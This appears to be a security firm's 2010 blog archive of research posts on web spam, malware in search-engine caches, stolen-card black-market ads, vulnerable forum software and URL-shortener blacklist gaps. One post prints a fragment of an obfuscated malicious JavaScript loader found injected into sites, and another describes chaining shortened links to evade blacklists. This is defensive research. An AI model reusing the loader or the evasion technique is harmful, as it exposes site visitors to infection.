We offer specialized services for safeguarding the security, health status and, consequently, the reputation of your site. Don't let web security stand in the way of your e-business.
Have you been hacked? Are you experiencing problems with your site? Sign up for services. Let us take care of your site.
Popular Internet websites are a good place to advertise and therefore a target for spammers. Large throngs of visitors who view content on popular sites are the main draw. Spammers use vulnerabilities in message boards and forums to insert spam advertisements.
This “malvertising” is bad for the reputation of the website in question and because it opens up a Pandora’s box of security issues if a visitor decides to follow the link in the advertisement. In this short article we try to determine if certain subsets of the most popular 1 million Internet websites are more vulnerable to attack by spammers.
Experiment Goals
Methodology
We obtained a list of the top 1 million websites from Alexa. We partitioned the list into 3 equal parts, designated as “top,” “middle” and “low” websites. From each subset, we randomly selected 1000 websites and determined if they were hosting spam advertisements.
To determine whether a site was hosting spam advertisements, we queried Google and other search engines with a list of keywords suggesting pharmacy spam (e.g. “buy Kamagra cheap” and “no prescription needed”). Once a website was found to include spam advertisements, the suspect pages from that website were downloaded to ensure that spam advertisements were indeed present.
Interesting Results
Conclusion
It is surprising to see that “top” ranking websites were more than twice as likely to have spam advertisements on their web pages than “middle” or “low” ranking websites.
It could be that spammers prefer to concentrate on the most popular sites versus the not-so-popular ones or that popular sites have more discussion/message boards that can be exploited. This question could be the basis of a more in-depth study of this phenomenon.
Read more…
Search engines, like Google, Yahoo and Bing offer users the ability to scour the plethora of information on the Internet. These search engines index content on websites and often maintain cached copies of these sites so that, in the event that the site is unavailable, visitors can still view the contents of the website.
Unfortunately, the idea of page caching has not been implemented well. In fact, page caching has opened up new opportunities for malware. The primary problem being that, from a security perspective, when search engines cache copies of websites, they are storing any malware that is present on the site on their own infrastructure as well.
Most large search engines use some kind of malware analysis to determine if a website is compromised or not. Google for example, has a well tuned system with high accuracy. In our meeting with the Google malware team, some months ago, we were glad to find that they were already aware of this problem. In the weeks following our interaction, cached copies of infected websites were no longer easily available via searches.
Not so long ago, we wrote an article about our efforts to alert Yahoo of the presence of malware in the cached versions of various web pages served up by their search engine. Our efforts were not successful, although the occurrence of malware in Yahoo cached pages seems to have gone down significantly. Perhaps our messages were not entirely ignored.
Recently, an article came up on ISC SANS discussing this very same issue.
Recently, we have found instances of Bing serving up malware in their cached pages. It seems that Bing’s malware detection methods are not able to reliably detect malware on cached web pages. This keeps Bing from securing cached pages which contain malware for its users. We have provided screen shots below as an example of the issue. In this particular case, the strain of malware found in Bing cached pages has been around since 2009.
Consider the case where a malicious individual deliberately infects a website with malware and Bing (or another search engine) indexes it. The malicious individual can then send out hyperlinks pointing to the cached web pages hosted by Bing. Any kind of “reputation-checking” for the cached link will confirm that the page is hosted by a reputable company, in this case, Bing (Microsoft). However, the malware will still be able to deliver its payload. Just in case you’re thinking, “my antivirus will protect me from the malware on the cached page,” you may like to read this article.
It is surprising to see that search engines like Bing, which claim to implement malware detection, cannot correctly determine if a cached copy of a web page hosts malware! In these cases, Bing ends up an excellent attack vector for malicious individual.
It remains to be seen if search engine companies will continue to serve up cached pages laced with malware at the same time as they are touting active scan and detection mechanisms. Let’s hope this article can get attention in the upper echelons of management at these large search giants and they start to pay attention to this problem.
Screen shots follow below:
Credit card data has been traded on the cyber black-market for a number of years. The relatively recent breaches of TJX Companies (owner of T.J. Maxx) and Heartland Payment Systems show the extent to which criminals will go in order to harvest credit card numbers, social security numbers, names, addresses and more. All this legitimate (but stolen) information fuels a world of cyber crime.
In this article we show that, unlike what you might think, the credit card black-market operates very much in the open. Below we point out websites, which can be used to tap into the cyber black-market and find stolen credit card numbers and the associated credentials to purchase for any purpose they desire. We also show instant messenger handles, emails and details of what cyber criminals are selling on the Internet.
We analyzed 429 unique domains and 615 unique URLs. Each of these URLs contained information about buying stolen credit card information. Each URL lead to a web page where cyber-criminals have posted details about how to interact with them and buy stolen financial credentials. In the majority of cases, cyber criminals who are selling this information can provide one of the following types of data.
The data for this article was collected between February 27th and March 2nd, 2010.
Basic Credit Card Information Offers:
Usually consists of credit card number, type, expiration date and CVV.
USA & CANADA CCV2 VISA/Mastercard ~ 2USD/each AmEX/Discover ~ 4 USD/each UK & WU CVV2 VISA/Mastercard ~ 3USD/each AmEx/Discover ~ 5USD/each
Premium Credit Card Information Offers:
Usually consists of credit card number, type, expiration date, CVV, SSN, Home Address, Full Name, Date of Birth and much more.
USA & CANADA CCV2 VISA/Mastercard ~ $35/each UK & EU VISA/Mastercard ~ $40/each ACCOUNT INFORMATION: First Name: xxxxx Last Name: xxxxx Address: xxxxx xxxxx xxxxx xxxxx Apt: City: Homestaed State: FL Zip: xxxxx Home Phone: (xxxxx)xxxxx-xxxxx Work Phone: (xxxxx)xxxxx-xxxxx Email: xxxxx@yahoo.com SSN: xxxxx-xxxxx-xxxxx License Number: xxxxx-xxxxx-xxxxx-xxxxx-xxxxx License State: FL DOB: 09/xxxxx/xxxxx PAYMENT INFORMATION: Credit Card Type: VISA Number: xxxxxxxxxxxxxxx CCV: 889 Expiration Date: 11/2008 Name: xxxxx xxxxx Card Name First: xxxxx Card Name Last: xxxxx
PayPal Information Offers:
Verified account ~ 20USD/each Verified account with email pin ~ 25USD/each Verified acccount with full info ~ 35USD/each unverified account ~ 10USD/each
Some domains host multiple instances of stolen Credit Card Ads, (CC-Ads). We present the frequency distribution of CC-Ads on each unique domain below.
Frequency of CC-Ads on each unique domain.
Interesting Highlights:
IP Geo-location for websites with CC-Ads.
Conclusion:
It is clear from the current state of the credit card black-market that cyber criminals can operate much too easily on the Internet. They are not afraid to put out their email addresses, in some cases phone numbers and other credentials in their advertisements. It seems that the black market for cyber criminals is not underground at all. In fact, it’s very “in your face.” Clearly a more concerted effort is required to clamp down on this problem. Simply tying up loose ends on the enterprise side is not enough to combat this problem when there is virtually nothing to stop criminals from touting their stolen wares freely in the Internet.
Read more…
“Spain Busts Hackers for Infecting 13 Million PCs”
Users were targeted via a vulnerability in Internet Explorer when they visited websites infected with the malware. Spanish authorities shutdown the Mariposa bot-net on December 23, 2009 although the details of what is being called the “largest cyber-raid to date” are just being released.
Infection Statistics:
Code injection attacks show no signs of abating. Everyday more than 6000 new websites are added to Google’s Safe Browsing List (blacklist). Hackers are compromising websites without the knowledge of the website owner to, in turn, infect website visitors.
Malicious hackers don’t care if the website they infect is a small mom and pop operation or a large e-business. They use automated “bots” in most cases, which will attack any and every website they can exploit. No website is off limits.
As an example of the rampant nature of this problem, we will show how we found over 3000 infected websites out of which only a small percentage seems to be blacklisted by current website reputation services. One of the most reliable reputation services, offered by Google, only managed to identify a small portion of the whole of the infected websites we mined using Google’s own search results. Identifying infected websites is not trivial.
We recently saw a strong rise in the appearance of the malicious code below:
this.v="";:LineMixer [var i=15492;var y=window;var o='';var op='';
var a='s*c*r:iVpTt:'.replace(/[\:
TVJ\*]/g, '');var yx=new Array();
var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\*bjY]/g, '');
var _=new Array();this.nt="";]var k;if(k!='dh' && k != '')
{k=null};y.onload=function(){var w;if(w!='' && w!='ns'){w=null};
try {this.n_=false;uh=document[u](a);var ow="";var f="";
var xl=new String();var xf="xf";:LineMixer [uh['s;rpcp'.replace(/[p;t6O]/g, '')]
='hHt4tVp4:5/V/4e4x4aHmViVnVe4
By searching for a small part of the above portion of this code on Google (shown below), we found a list of websites which harbor the above code. A simple mention of this code on the pages of a website does not necessarily imply that the website is bad. It could be that a website administrator was asking for clarification on help forum. However, a detailed (automated) examination is performed by our systems to remove any doubt.
this.v="";:LineMixer [var i=
Interestingly, only 5.7% of the 3000+ infected sites we found exploited with this code were blacklisted by Google. This highlights the fact that even reliable blacklists, like the Google’s Safe Browsing List are not complete.
Till next time.
Read more…
Government websites play a critical role in the transfer of information to citizens, visitors, businessmen and others throughout their lives. Most importantly many people trust government websites implicitly. By virtue of this immense trust placed in websites which are relied on for information dissemination and collection by the government, one would expect that something as basic as SSL authentication (via certificates) would be in use by these websites to prove unambiguously to visitors that they are really connecting to the website they expect.
Consider the fact that malicious individuals and organizations have already targeted government organizations including the FDIC, IRS, FBI and many more with success. The government response trying to educate the masses can be found in many places. [1] [2] [3]
The goal of this experiment:
Experiment methodology:
An initial corpus of 150 government websites was mined (via USA.gov). Each website was tested for three signs that indicate whether they employ any authentication mechanism to prove their identity to a visitor.
This experiment was conducted between February 24th and February 25th, 2010.
The three points are listed below:
We present the most interesting results here:
Significant numbers of government websites are not using authentication mechanisms effectively.
Conclusion:
This limited experiment shows that websites operated by the government have a long way to go in terms of proving their identity to end users. These issues should not be treated lightly as they provide impetus to malicious individuals to develop phishing scams targeting government owned infrastructure.
Note: Due to the sensitive nature of this information we will not disclose specific government sites with security issues.
The stopthehacker.com team traveled to Omaha, Nebraska, in early February to meet with other cyber security companies and corporate, academic and government leaders. Anirban Banerjee, stopthehacker.com co-founder, appeared in a video interview conducted by Jeff Slobotski of the Silicon Prairie News.
Watch Anirban describe the goals of stopthehacker.com:
Thanks again to the Silicon Prairie News for covering us at the event!
URL shortening services have become all the rage on the Internet. These services take a long URL as input and produce a short, easy to use, URL as an output. Simple! By virtue of their ease of use, millions of Internet surfers use them to post messages on twitter. In fact, URL Shortening services like bit.ly have garnered so much attention that even giants like Google and Microsoft have jumped onto the URL shortening bandwagon.
Case in point:
These URL shortening services are godsend for Internet surfers tired of copying and pasting long, ugly looking, URLs. But hold on a minute! All is not hunky dory in URL Shortening Land.
Due to processes inherent to “URL Shortening,” the original URL an Internet surfer might like to shorten is, for all purposes, being obfuscated. Is this a problem? Yes. Why, you ask? Consider the fact that people, not even necessarily tech-savvy ones, have learned to double check the links present in their emails and on websites. They even have help from various browser plugins, but in general, users are smartening up. When these same people see “shortened” links, they have no way to make a judgment call on whether visiting the link is safe, or not. For example, you may recognize www.stopthehacker.com as being a benign, safe to visit link, but what about bit.ly/oJMrP or bit.ly/dc38ze?
Articles published from credible sources, like ISC SANS, show that URL shortening services, when compromised, can provide an excellent mechanism for malicious hackers to infect unsuspecting visitors. Criminals use these services to bypass Google’s Safe Browsing service, which is used by popular browsers.
To combat this growing menace, URL shortening services have partnered with security companies to identify malicious URLs and websites. Some of them even use the SURBL blacklists to identify if someone has tried to link to a malicious website.
This article attempts to identify the effectiveness of security measures put in place by the various URL shortening services.
This experiment answers the following questions:
The 25 URL shortening services evaluated in this article are listed below:
We compare 25 URL shortening services listed below. Each URL shortening service is analyzed to measure the effectiveness of their security measures. We use a two stage process to evaluate the security implemented by each service.
snipr.com budurl.com bit.ly short.to twurl.nl chilp.it fon.gs ub0.cc snurl.com fwd4.me short.ie a.gd hurl.ws kl.am to.ly hex.io tr.im cli.gs urlborg.com is.gd sn.im ur1.ca tweetburner.com tinyurl.com snipurl.com
Experiment methodology:
An initial corpus of 932 websites was obtained from Malware Patrol a well respected source of information about malware infected websites, which receives nearly 3,500,000 hits/month. This experiment was conducted between February 2nd and February 4th, 2010.
For each URL obtained from Malware Patrol, we attempt to create shortened URLs for each site domain and full URL using each of the 25 services.
We denote a service as Stage 1 Compliant if it appears to use a security service or blacklist to identify malicious domains and does not allow a user to create a shortened link to any infected domain. Does the URL shortening service allow a user to create a URL pointing to a malicious domain (e.g. http://www.badsite.dom)?
We denote a service as Stage 2 Compliant if it uses a security service or blacklist to identify malicious domains and does not allow a user to create a shortened link to any infected domain or malicious full URL hosted on that domain. Does the URL shortening service allow a user to create a URL pointing to a malicious link hosted on a malicious domain (e.g. http://www.badsite.dom/badfolder/badfile)?
We present the most interesting results in brief:
Observations on specific URL shortening services:
Venn Diagram depicting URL filtering capabilities of URL shortening services. Only about half of the most popular URL shortening services are effective at blocking malicious URLs.
Stage 1 Compliant and Stage 2 Compliant services:
budurl.com cli.gs fon.gs hex.io is.gd kl.am sn.im snipr.com snipurl.com snurl.com to.ly tr.im ub0.cc
Deeper security issues remain:
It seems that popular services like bit.ly, which do try to use blacklists in order to prevent malicious hackers from using their services and pointing to bad websites, can still be easily fooled by chaining together shortened URLs created by another service. We have found that if a malicious user can create a shortened URL using a service that does not implement blacklist checks or is not effective, then a service like bit.ly can be tricked into redirecting the visitor via the malicious shortened URL to a malicious domain. Effectively, users can be redirected to a malicious site regardless of bit.ly performing all its checks. See the appendix for an example below (wget log).
Conclusion:
This limited experiment shows that URL shortening services have a long way to go before Internet users can trust them to deliver safe links. About half of the most popular URL shortening services seem to be somewhat effective at blocking access to well known malicious URLs that can be found on blacklists. It remains to be seen if these URL shortening services can improve and provide a safer web experience for their users.
This article is the last in our series of articles on CMS analysis, this time we will be focusing on vBulletin. We have previously profiled Joomla, WordPress, Drupal and phpBB.
vBulletin is a little bit different than the list of CMSes we have been analyzing in this series. The first and most apparent being that it is not a free piece of software. The vBulletin site displays a cost of $195-$285 for a new license. The obvious question then, is why do people pay for this CMS when there are other good CMSs available for free? The answer lies in the varied list of features, such as a built-in photo album, event management and many other interesting and helpful features. Add to this good support, compatibility with existing software, many themes, built-in integration for payment engines and advertisement support… it’s not hard to see why vBulletin has acquired a large fan base.
Next, we will take a closer look at vBulletin to understand security issues facing active installations seen publicly on the Internet.
The aim of this experiment:
Experiment methodology:
An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed vBulletin. Understandably, not all 100,000 websites would actually be using vBulletin. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by vBulletin or its associated plugins. Each website was then cross-referenced with the Google Safe Browsing List. This experiment was conducted between February 5th and February 8th, 2010.
Distribution of vBulletin versions:
In 93.09% of sites running on vBulletin the version number could be identified. We found the following distribution of vBulletin versions in the websites examined (where versions of installations could be determined). A more detailed breakdown of the distribution of vBulletin versions can be seen at the end of this article.
Significant numbers of older vBulletin installations are present on the Internet.
Note: Publicly available information about exploits for vBulletin 3.x.x and earlier versions exist. [1] [2]
We present the most interesting results here:
Conclusion:
This limited experiment shows that like WordPress, vBulletin also suffers from a large number of vulnerable installations being available on the Internet. It is intriguing to see that a CMS system, which is not free, and is tightly controlled is not kept up to date across the board. Consider the case of Drupal, where we observed that the variety in the versions of various installations is very low. The natural question at this point is: why is a free CMS system like Drupal doing better, security-wise, than a commercial CMS system like vBulletin? Why are most Drupal installations up to date. One thing to note though is that like Drupal and phpBB, vBulletin installations also seem to be relatively safe from the most prevalent malware. Most Iframes on vBulletin sites are Ads, a likely revenue stream for most forum admins.
The fact remains that there many vulnerable installations of vBulletin which can fall prey to malicious hackers.
Till next time.
Read more…
Continuing with our series of articles on CMS security, this time we will be focusing on phpBB. We have previously profiled Joomla, WordPress, and Drupal.
I can already hear CMS purists howling that phpBB is not a CMS. In a way they’re right, but in other ways it is a CMS. phpBB is without a doubt one of the most popular “Internet Forum” software packages available. Its ease of installation, various custom skins, and large installation base make it a very attractive choice for anyone who wishes to set up a community discussion board on the Internet. phpBB has had a few million downloads at the very least and enjoys a very active user group.
phpBB is popular among webmasters who want to set up Internet forums easily. Users of phpBB also benefit from a high level of customization. Another big plus for this CMS. Support for this CMS is awesome, in fact, phpBB has flash based video tutorials to help new users get started! Additionally, the phpBB developer community is very security conscious.
Next, we will take a close look at phpBB to understand security issues with active installations seen publicly on the Internet.
The aim of this experiment:
Experiment methodology:
An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed phpBB. Understandably, not all 100,000 websites would actually be using phpBB. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by phpBB or its associated plugins. Each website was then cross-referenced with the Google Safe Browsing List. This experiment was conducted between February 1st and February 3rd, 2010.
Distribution of phpBB versions:
In 84.16% of sites running on phpBB a version number of the CMS package could be identified. We found the following distribution of phpBB versions in the websites examined (where versions of installations could be determined).
We present the most interesting results:
Conclusion:
This limited experiment shows that like Drupal, phpBB installations seem to be relatively safe from the most prevalent forms of malware. However, the fact remains that there are quite a few vulnerable installations of phpBB which can fall prey to malicious hackers. This trend is echoed by our analysis of WordPress . It will be interesting to probe further and understand why the number of “infected” sites is not higher when there are vulnerable installations in the wild.
Till next time.
Supported in part by award #0839491